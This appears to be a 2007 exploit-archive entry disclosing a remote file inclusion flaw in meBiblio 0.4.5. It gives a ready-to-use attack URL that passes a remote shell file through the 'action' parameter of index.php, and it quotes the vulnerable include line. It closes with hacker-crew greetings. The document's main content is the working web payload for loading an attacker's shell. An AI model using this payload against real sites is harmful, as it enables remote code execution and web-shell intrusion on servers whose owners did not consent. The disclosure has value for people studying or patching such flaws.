[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : meBiblio 0.4.5 (index.php action) Remote File Inclusion Vulnerability
# Published : 2007-11-17
# Author : ShAy6oOoN
# Previous Title : Sciurus Hosting Panel Remote Code Injection Exploit
# Next Title : phpBBViet <= 02.03.2007 (phpbb_root_path) Remote File Inclusion
~~~~~~~~~~~~~~~~~~~~~~~~
~ meBiblio 0.4.5 RFI ~
~~~~~~~~~~~~~~~~~~~~~~~
---------------------
Author : ShAy6oOoN
---------------------
Group : PitBull Crew
---------------------
Script : meBiblio 0.4.5
---------------------
Download : http://downloads.sourceforge.net/mebiblio/meBiblio-0.4.5.tar.gz?modtime=1195237984&big_mirror=0
---------------------
Vulnerability Type : Remote File Inclusion
---------------------
Vulnerable file : index.php
---------------------
Exploit URL : http://localhost/path/index.php?action=http://localhost/shell.txt?
---------------------
Method : get
---------------------
Register_globals : On
---------------------
Vulnerable variable : action
---------------------
Line number : 41
---------------------
----------------------------------------------
//print "<p>Action = $action" ;
include "$action.inc.php";
}
----------------------------------------------
Greetings:
----------
PitBull Crew : The_PitBull - iNs - c0ol - Raz0r - Inphex
Thanks To:
----------
str0ke
# www.Syue.com [2007-11-17]